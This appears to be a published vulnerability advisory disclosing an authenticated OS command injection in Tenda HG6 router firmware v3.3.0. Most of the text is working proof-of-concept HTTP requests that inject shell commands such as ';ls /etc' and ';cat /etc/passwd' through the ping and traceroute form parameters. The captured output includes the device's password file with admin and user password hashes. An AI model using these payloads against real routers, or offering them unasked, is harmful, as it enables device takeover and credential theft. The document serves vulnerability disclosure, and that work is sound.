# Exploit Title: Tenda HG6 v3.3.0 - Remote Command Injection
# Exploit Author: LiquidWorm

Tenda HG6 v3.3.0 Remote Command Injection Vulnerability


Vendor: Tenda Technology Co.,Ltd.
Product web page: https://www.tendacn.com
                  https://www.tendacn.com/product/HG6.html
Affected version: Firmware version: 3.3.0-210926
                  Software version: v1.1.0
                  Hardware Version: v1.0
                  Check Version: TD_HG6_XPON_TDE_ISP

Summary: HG6 is an intelligent routing passive optical network
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),
a voice port to meet users' requirements for enjoying the Internet,
HD IPTV and VoIP multi-service applications.

Desc: The application suffers from an authenticated OS command
injection vulnerability. This can be exploited to inject and
execute arbitrary shell commands through the 'pingAddr' and
'traceAddr' HTTP POST parameters in formPing, formPing6,
formTracert and formTracert6 interfaces.

Tested on: Boa/0.93.15


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5706
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php


22.04.2022

--


ping.asp:
---------
POST /boaform/formPing HTTP/1.1
Host: 192.168.1.1

pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564

---
TZ app.gwdt bftpd.conf buildtime check_version.txt config config.csv
config_default.xml config_default_hs.xml dhclient-script dnsmasq.conf
ethertypes factory_default.xml ftpdpassword group hardversion inetd.conf
init.d inittab innversion insdrv.sh irf mdev.conf omci_custom_opt.conf
omci_ignore_mib_tbl.conf omci_ignore_mib_tbl_10g.conf omci_mib.cfg orf
passwd ppp profile protocols radvd.conf ramfs.img rc_boot_dsp rc_voip
release_date resolv.conf rtk_tr142.sh run_customized_sdk.sh runoam.sh
runomci.sh runsdk.sh samba scripts services setprmt_reject shells
simplecfgservice.xml smb.conf softversion solar.conf solar.conf.in
ssl_cert.pem ssl_key.pem version wscd.conf


ping6.asp:
----------
POST /boaform/formPing6 HTTP/1.1
Host: 192.168.1.1

pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp

---
boa.conf web


tracert.asp:
------------
POST /boaform/formTracert HTTP/1.1
Host: 192.168.1.1

traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp

---
/home/httpd


tracert6.asp:
-------------
POST /boaform/formTracert6 HTTP/1.1
Host: 192.168.1.1

traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp

---
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh
nobody:x:0:0::/tmp:/dev/null
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh